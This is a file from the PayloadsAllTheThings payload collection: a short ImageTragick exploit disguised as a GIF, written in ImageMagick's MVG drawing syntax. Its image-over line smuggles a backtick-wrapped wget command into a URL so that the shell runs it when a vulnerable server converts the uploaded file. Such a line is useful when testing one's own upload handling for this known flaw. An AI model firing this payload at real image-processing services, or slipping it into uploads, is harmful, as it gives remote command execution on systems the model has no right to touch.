PayloadsAllTheThings/Upload Insecure Files/CVE Image Tragik/imagetragik1_payload_imageover_wget.gif
2019-03-07 00:07:55 +01:00

5 lines
146 B
Plaintext

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- 127.0.0.1:1337 > /dev/null`'
pop graphic-context